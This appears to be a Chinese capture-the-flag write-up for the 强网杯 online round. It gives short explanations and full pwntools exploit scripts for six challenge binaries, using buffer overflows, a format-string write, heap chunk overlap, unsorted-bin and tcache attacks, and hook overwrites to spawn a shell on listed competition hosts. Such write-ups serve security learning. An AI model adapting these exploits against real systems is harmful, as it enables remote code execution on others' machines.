强网杯_线上赛

我太菜了,不会windows pwn,不会python pwn,盯着SQLite3 一整天,蹲一波其他师傅的WP,题目附件

babymessage - 强网先锋

case 2中溢出修改 rbp的末尾字节 然后退出程序可以有概率调用 start函数,此时m为4,故第二次回到主函数的时候可以在case 2溢出到ret_address,修改ret_address为set rdi=0x100 然后进入leave_message的地址,注意第二次溢出的rbp值需要保存有一个可写的地址,进入后则是一个简单的ret2libc

from pwn import*
# Connection handles: the local process is opened first and then immediately
# replaced by the remote connection, so only the remote one is driven below.
p = process('./main')
p = remote('123.56.170.202', 21342)
# Challenge binary (for PLT/GOT/.bss lookups) and the libc it was shipped with.
elf, libc = ELF('./main'), ELF('./libc-2.27.so')
def menu(ch):
    """Wait for the 'choice: ' prompt and answer it with *ch*, rendered as text."""
    choice = str(ch)
    p.sendlineafter('choice: ', choice)
# Addresses the author hard-codes for this binary: the re-entry point into
# leave_message and a pop rdi; ret gadget.  The fake saved rbp points into a
# writable .bss area (author's prose: the saved rbp must stay writable).
leave_message = 0x40098E
pop_rdi_ret = 0x400AC3
fake_rbp = p64(elf.bss() + 0x200)
pad = 'FMYYFMYY'

# First pass: only the low byte of the saved rbp is touched, then option 4 exits
# (author's prose: this sometimes lands back in start).
menu(2)
p.sendafter('message:', pad + '\x68')
menu(4)

# Second pass: saved rbp and return address are overwritten together.
menu(2)
p.sendafter('message:', pad + fake_rbp + p32(leave_message))

# puts(GOT[puts]) prints the resolved address, then control returns to leave_message.
leak_chain = [fake_rbp, p64(pop_rdi_ret), p64(elf.got['puts']), p64(elf.plt['puts']), p64(leave_message)]
p.sendafter('message:', pad + ''.join(leak_chain))
leaked = p.recvuntil('\x7F')[-6:].ljust(8, '\x00')
libc_base = u64(leaked) - libc.sym['puts']
log.info('LIBC:\t' + hex(libc_base))

system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh').next()
final_chain = [fake_rbp, p64(pop_rdi_ret), p64(binsh), p64(system)]
p.sendafter('message:', pad + ''.join(final_chain))
p.interactive()

Siri - 强网先锋

一个简单的格式化字符串,leak了stack地址之后就是对上面的地址进行一个返回地址和保存的rbp进行一个修改,通过抬栈 执行 one_gadget

from pwn import*
# Connection handles: the local process is replaced by the remote one straight away.
p = process('./main')
p = remote('123.56.170.202', 12124)
libc = ELF('./libc-2.27.so')


def _leak(tag, width):
    """Skip to *tag* in the output and parse the next *width* characters as hex."""
    p.recvuntil(tag)
    return int(p.recv(width), 16)


p.sendlineafter('>>> ', 'Hey Siri!')
offset = 14  # kept from the original script; not used below

# One format string reads four stack slots at once; the labels make the reply
# easy to split.  The fixed deltas turn each raw value into a base address.
p.sendlineafter('>>> ', 'Remind me to  ' + 'BBBBAAAAAAAAStack:%46$pLIBC:%83$pPROC:%47$pCanary:%45$p')
stack = _leak('Stack:', 14) - 288
log.info('Stack:\t' + hex(stack))
libc_base = _leak('LIBC:', 14) - 231 - libc.sym['__libc_start_main']
log.info('LIBC:\t' + hex(libc_base))
proc_base = _leak('PROC:', 14) - 0x144C
log.info('Proc:\t' + hex(proc_base))
canary = _leak('Canary:', 18)
log.info('Canary:\t' + hex(canary))

# Addresses relative to the recovered bases; open/read/puts are computed but unused.
pop_rdi_ret = proc_base + 0x0152B
leave_ret = proc_base + 0x12E2
rce = libc_base + 0x10A45C
open_sys = libc_base + libc.sym['open']
read_sys = libc_base + libc.sym['read']
puts = libc_base + libc.sym['puts']

p.sendlineafter('>>> ', 'Hey Siri!')
# Low 16 bits of the two values the %hn specifiers below write (author's prose:
# saved rbp and return address are patched so that leave; ret lifts the stack).
off_1 = (stack + 0x50) & 0xFFFF
off_2 = leave_ret & 0xFFFF
#gdb.attach(p,'b *0x5555555552A2')
# The smaller value is written first so both %c widths stay non-negative; the
# two target pointers (positional args 55 and 56) are ordered to match.
if off_1 > off_2:
    first, second = off_2, off_1
    targets = p64(stack + 8) + p64(stack)
else:
    first, second = off_1, off_2
    targets = p64(stack) + p64(stack + 8)
payload = 'Remind me to ' + '%' + str(first - 27) + 'c%55$hn' + '%' + str(second - first) + 'c%56$hn'
payload = payload.ljust(0x38, '\x00') + targets + p64(rce)
p.sendlineafter('>>> ', payload)
p.interactive()

Just a Galgame - 强网先锋

如果top_chunk的size 不够申请的大小,就会另外开辟一个top_chunk,将原先top_chunk扔进unsorted bin,切割后拿到libc_base,在case 5有个read(0,0x4040A0,8);往栈上写一个地址,然后case 2没有对 index 索引进行检测,可以越界修改这个地址里面的内容,即可将malloc_hook写为rce

from pwn import*
# Echo every byte sent and received while the script runs.
context.update(log_level='DEBUG')
def menu(ch):
    """Answer the '>> ' prompt with *ch* rendered as text, followed by a newline."""
    choice = str(ch)
    p.sendlineafter('>> ', choice)
def new():
    """Menu option 1: create a new entry (no further prompts are answered)."""
    menu(1)
def edit(index, name):
    """Menu option 2: pick entry *index*, then send *name* raw (no newline) as its movie name."""
    menu(2)
    idx_text = str(index)
    p.sendlineafter('idx >>', idx_text)
    p.sendafter('movie name >> ', name)
def large():
    """Menu option 3 (the large allocation; no further prompts are answered)."""
    menu(3)
def show():
    """Menu option 4: print the stored entries (output is read by the caller)."""
    menu(4)
def leave(say):
    """Menu option 5: after the 'QAQ' prompt (terminated by a newline), send *say* raw."""
    menu(5)
    p.sendafter('QAQ\n', say)
# Connection handles: the local process is replaced by the remote one straight away.
p = process('./main')
p = remote('123.56.170.202', 52114)
libc = ELF('./libc-2.27.so')

new()
# Overwrite the size field that follows entry 0 (author's prose: the top chunk
# becomes too small for the large request, so the old top chunk is binned).
edit(0, p64(0) + p64(0xD41))
large()
new()
show()
# The printed entry carries a libc pointer; the constants fold it back to the base.
leaked = p.recvuntil('\x7F')[-6:].ljust(8, '\x00')
libc_base = u64(leaked) - libc.sym['__malloc_hook'] - 0x10 - 1632
log.info('LIBC:\t' + hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
rce = libc_base + 0x10A45C
# Option 5 stores a pointer that option 2 then writes through via an unchecked
# index (author's prose), so the edit lands on __malloc_hook.
leave(p64(malloc_hook - 0x60))
edit(8, p64(rce))
new()
p.interactive()

babynotes - 强网先锋

因为在regset中 strcpy 可以导致堆溢出修改下一个块的size,则可构造 chunk overlap,然后往malloc_hook中写入rce

from pwn import*
#context.log_level ='DEBUG'
def menu(ch):
    """Answer the '>> ' prompt with *ch* rendered as text, followed by a newline."""
    choice = str(ch)
    p.sendlineafter('>> ', choice)
def new(index, size):
    """Menu option 1: allocate a note of *size* bytes in slot *index*."""
    menu(1)
    for prompt, value in (('index:', index), ('size:', size)):
        p.sendlineafter(prompt, str(value))
def show(index):
    """Menu option 2: print the note in slot *index* (output is read by the caller)."""
    menu(2)
    idx_text = str(index)
    p.sendlineafter('index:', idx_text)
def free(index):
    """Menu option 3: release the note in slot *index*."""
    menu(3)
    idx_text = str(index)
    p.sendlineafter('index:', idx_text)
def edit(index, content):
    """Menu option 4: overwrite slot *index* with *content*, sent raw (no newline)."""
    menu(4)
    idx_text = str(index)
    p.sendlineafter('index:', idx_text)
    p.sendafter('note:', content)
def Set(name, motto, age):
    """Answer the profile prompts: *name* and *motto* go out raw, *age* as a text line."""
    for prompt, value in (('name:', name), ('motto:', motto)):
        p.sendafter(prompt, value)
    p.sendlineafter('age:', str(age))
def check():
    """Menu option 6 (no further prompts are answered)."""
    menu(6)
# Connection handles: the local process is replaced by the remote one straight away.
p = process('./main')
libc = ELF('./libc-2.23.so')
p = remote('123.56.170.202', 43121)

Set('FMYY', 'FAQ', 0x21)
new(0, 0x100)
new(1, 0x18)
for idx in range(2, 5):
    new(idx, 0x60)
# Free and re-take slot 0; show() then prints a libc pointer left inside it.
free(0)
new(0, 0x100)
show(0)
leaked = p.recvuntil('\x7F')[-6:].ljust(8, '\x00')
libc_base = u64(leaked) - 0x10 - 88 - libc.sym['__malloc_hook']
log.info('LIBC:\t' + hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
rce = libc_base + 0xF1207

free(0)
free(1)
# Option 5 re-runs the profile setter; author's prose: its strcpy overflows into
# the next chunk's size field, which is what makes the chunks overlap below.
menu(5)
Set('U' * 0x18, 'FAQ', 0xE1)
free(2)
new(0, 0x60)
new(1, 0x60)  # 1 = 3
for idx in (1, 0, 3):
    free(idx)
new(3, 0x60)
edit(3, p64(malloc_hook - 0x23))
for idx in (0, 5, 1):
    new(idx, 0x60)
edit(1, '\x00' * 0x13 + p64(rce))
free(0)
new(0, 0x60)
p.interactive()

easypwn

首先一个off by null 可以构造一个堆块重叠,然后爆破半个字节并利用unsorted bin attack 攻击 global_max_fast,之后则是一个 free对应大小的块 越界后覆盖stdout的read_end 和 write_ptr指针,并令覆盖的内容相同 即可 leak libc_base,之后则是一个攻击 malloc_hook写入rce的ez操作

from pwn import*
#context.log_level ='DEBUG'
def menu(ch):
    """Answer the 'Your choice:' prompt with *ch* rendered as text, followed by a newline."""
    choice = str(ch)
    p.sendlineafter('Your choice:', choice)
def new(size):
    """Menu option 1: allocate a chunk of *size* bytes (the slot is chosen by the program)."""
    menu(1)
    size_text = str(size)
    p.sendlineafter('size:', size_text)
def edit(index, content):
    """Menu option 2: overwrite slot *index* with *content*, sent raw (no newline)."""
    menu(2)
    idx_text = str(index)
    p.sendlineafter('idx:', idx_text)
    p.sendafter('content:', content)
def free(index):
    """Menu option 3: release slot *index*."""
    menu(3)
    idx_text = str(index)
    p.sendlineafter('idx:', idx_text)
def F(index):
    """Prompt-free free(): send the option and *index* as lines, pausing 50 ms before each."""
    for line in ('3', str(index)):
        sleep(0.05)
        p.sendline(line)
def E(index, content):
    """Prompt-free edit(): option and *index* as lines, then *content* raw, 50 ms before each send."""
    for line in ('2', str(index)):
        sleep(0.05)
        p.sendline(line)
    sleep(0.05)
    p.send(content)
# Retry loop: author's prose says half a byte has to be guessed, so every attempt
# starts from a fresh process and any failure restarts the whole sequence.
while True:
    p = process('./main')
    libc = ELF('./libc-2.23.so')
    # p = remote('39.101.184.181',10000)
    try:
        # Slots 0-7.
        for size in [0x18] + [0x2F8] * 2 + [0x380] * 5:
            new(size)
        edit(7, (p64(0) + p64(0x21)) * 0x38)
        new(0x18)   # 8
        free(0)
        # Author's prose: an off-by-null from slot 1 reaches slot 2's size field.
        edit(1, '\x00' * 0x2F0 + p64(0x320))
        free(2)
        ####################
        # Slots 0, 2, 9, 10, 11, 12, 13 are carved out of the overlapping region.
        for size in (0x18, 0x78, 0x78, 0xF8, 0x88, 0x68, 0x2F8):
            new(size)
        free(2)
        edit(9, '\x00' * 0x70 + p64(0x100))
        free(10)
        new(0x78)  # 2
        new(0x78)  # 10 = 9
        new(0xF8)  # 14
        free(2)
        # Two-byte partial overwrite; presumably where the guessed half byte lands (verify).
        edit(1, p64(0) + '\xE8\x37\n')
        new(0x70)
        edit(1, '\x00' * 0x78 + p64(0x1631) + '\n')
        free(9)
        # Prompt-free variants are used for the next two operations.
        E(1, '\x00' * 0x78 + p64(0x1651) + '\n')
        F(10)
        leaked = p.recvuntil('\x7F')[-6:].ljust(8, '\x00')
        libc_base = u64(leaked) - 131 - libc.sym['_IO_2_1_stdout_']
        log.info('LIBC:\t' + hex(libc_base))
        malloc_hook = libc_base + libc.sym['__malloc_hook']
        rce = libc_base + 0xF0364
        free(12)
        edit(1, '\x00' * 0x288 + p64(0x71) + p64(malloc_hook - 0x23) + '\n')
        new(0x60)  # 9
        new(0x60)  # 10
        edit(10, '\x00' * 0x13 + p64(rce) + '\n')
        new(0x10)
        break
    except:
        # Bare except kept on purpose: a wrong guess surfaces as an arbitrary
        # tube error and must restart the attempt.  Note it also swallows
        # KeyboardInterrupt, so Ctrl-C only kills the current attempt.
        p.close()
        continue
p.interactive()

oldschool

审计一下给的源文件即可知道,在mmap_edit中因为 < 和 > 符号搞错了,导致越界,往一个地址写入一个64位长的整型变量,此时只需要leak libc,然后计算出此偏移,因为mmap_edit时的指针类型为int类型,所以 需要之前 offset>>2 才是正确的offset,之后就是往free_hook写入一个system,free('/bin/sh')即可getshell

from pwn import*
# Echo every byte sent and received while the script runs.
context.update(log_level='DEBUG')
def menu(ch):
    """Answer the 'Your choice:' prompt with *ch* rendered as text, followed by a newline."""
    choice = str(ch)
    p.sendlineafter('Your choice:', choice)
def new(index, size):
    """Menu option 1: allocate *size* bytes in slot *index*."""
    menu(1)
    for prompt, value in (('Index: ', index), ('Size: ', size)):
        p.sendlineafter(prompt, str(value))
def edit(index, content):
    """Menu option 2: overwrite slot *index* with *content*, sent raw (no newline)."""
    menu(2)
    idx_text = str(index)
    p.sendlineafter('Index: ', idx_text)
    p.sendafter('Content: ', content)
def show(index):
    """Menu option 3: print slot *index* (output is read by the caller)."""
    menu(3)
    idx_text = str(index)
    p.sendlineafter('Index: ', idx_text)
def free(index):
    """Menu option 4: release slot *index*."""
    menu(4)
    idx_text = str(index)
    p.sendlineafter('Index: ', idx_text)
def m_new(index):
    """Menu option 6 (mmap_new): answer the 'start: ' prompt with *index* as text."""
    menu(6)
    start_text = str(index)
    p.sendlineafter('start: ', start_text)
def m_edit(index, value):
    """Menu option 7 (mmap_edit): store *value* at element *index*, both sent as text lines."""
    menu(7)
    for prompt, item in (('Index: ', index), ('Value: ', value)):
        p.sendlineafter(prompt, str(item))
def m_free():
    """Menu option 8 (mmap_free; no further prompts are answered)."""
    menu(8)
# Connection handles: the local process is replaced by the remote one straight away.
p = process('./main')
libc = ELF('./libc-2.27.so')
p = remote('106.14.214.3', 2333)

# Fill and drain eight 0x100-byte slots, then take seven back; slot 1 then
# holds a heap pointer that show() prints.  32-bit target: 4-byte reads (u32).
for i in range(8):
    new(i, 0x100)
for i in reversed(range(8)):
    free(i)
for i in range(1, 8):
    new(i, 0x100)

show(1)
p.recvuntil('Content: ')
heap_base = u32(p.recv(4)) - 0x380
log.info('HEAP:\t' + hex(heap_base))

new(0, 0x78)
new(8, 0x78)
edit(1, '/bin/sh\n')
show(0)
libc_base = u32(p.recvuntil('\xF7')[-4:]) - libc.sym['__malloc_hook'] - 0xD8
system = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
log.info('LIBC:\t' + hex(libc_base))
rce = libc_base + 0x3D130  # computed but not used below

# Author's prose: mmap_edit indexes through an int pointer, so the byte distance
# to __free_hook is divided by four.  0xE0000000 is presumably the mapping's
# address (not stated on the page).
m_new(0)
address = (free_hook - 0xE0000000) >> 2
m_edit(address, system)
free(1)
p.interactive()

direct

向上溢出,修改chunk的size,然后导致了堆块重叠,利用tcache dup把readdir保存有目录文件名称的附近的块申请下来,然后在向上溢出修改一下此块的size和next_chunk的prevsize和size域,再将此块放进unsorted bin中,则在closefile的选项中即可leak 出libc,之后则是简单的攻击 free_hook,往hook中写一个rce或者system的地址即可

from pwn import*
# Echo every byte sent and received while the script runs.
context.update(log_level='DEBUG')
def menu(ch):
    """Answer the 'Your choice: ' prompt with *ch* rendered as text, followed by a newline."""
    choice = str(ch)
    p.sendlineafter('Your choice: ', choice)
def new(index, size):
    """Menu option 1: allocate *size* bytes in slot *index*."""
    menu(1)
    for prompt, value in (('Index:', index), ('Size: ', size)):
        p.sendlineafter(prompt, str(value))
def edit(index, offset, size, content):
    """Menu option 2: write *size* bytes of *content* (sent raw) at *offset* into slot *index*.

    The program accepts negative offsets; the author relies on that to write
    before the chunk.
    """
    menu(2)
    for prompt, value in (('Index: ', index), ('Offset: ', offset), ('Size: ', size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter('Content: ', content)
def free(index):
    """Menu option 3: release slot *index*."""
    menu(3)
    idx_text = str(index)
    p.sendlineafter('Index: ', idx_text)
def openfile():
    """Menu option 4 (open the directory; no further prompts are answered)."""
    menu(4)
def closefile():
    """Menu option 5 (close the directory; output, if any, is read by the caller)."""
    menu(5)
# Retry loop: every attempt starts from a fresh connection and any exception
# restarts the whole sequence (the libc read below uses a short timeout).
while True:
    p = process('./main')
    libc = ELF('./libc-2.27.so.bak')
    p = remote('106.14.214.3', 1912)
    try:
        for i in range(8):
            new(i, 0xF0)
        openfile()
        closefile()
        #gdb.attach(p,'b *0x555555554D7E')
        # Negative offset: the write lands in front of the chunk (author's prose:
        # upward overflow into the size field).
        edit(0, -0x10, 0x100, p64(0) + p64(0x501))
        free(0)
        new(0, 0xF0)
        for idx in range(8, 13):
            new(idx, 0xF0)
        free(5)
        free(6)
        edit(7, -0x100, 0x100, '\xC0\xAA')
        new(6, 0xF0)
        new(5, 0xF0)
        free(7)
        free(6)
        for idx in reversed(range(5)):
            free(idx)
        # Author's prose: fix up this block's size and the next chunk's
        # prev_size/size, then free it so closefile() prints a libc pointer.
        fake_hdr = p64(0x101) + 'FMYY' + '\x00' * (0xF0 - 4) + p64(0x100) + p64(0x21) + '\x00' * 0x18 + p64(0x21)
        edit(12, -0x7FE8, 0x7FE8, fake_hdr)
        free(5)
        edit(12, -0x7FF0, 0x7FF8, 'F' * 0x10)
        closefile()
        # An empty read (timeout) yields u64 of eight NULs; the later p64() of the
        # resulting addresses then fails and the attempt is retried.
        leaked = p.recvuntil('\x7F', timeout=0.2)[-6:].ljust(8, '\x00')
        libc_base = u64(leaked) - libc.sym['__malloc_hook'] - 0x10 - 0x60
        log.info('LIBC:\t' + hex(libc_base))
        free_hook = libc_base + libc.sym['__free_hook']
        system = libc_base + libc.sym['system']
        new(7, 0xF0)
        free(8)
        new(0, 0xF0)
        edit(0, 0, 0x10, p64(free_hook))
        new(8, 0xF0)
        edit(8, 0, 0x10, '/bin/sh\x00')
        new(1, 0xF0)
        edit(1, 0, 0x10, p64(system))
        free(8)
        break
    except:
        # Bare except kept on purpose so any tube error restarts the attempt;
        # note it also swallows KeyboardInterrupt.
        p.close()
        continue
p.interactive()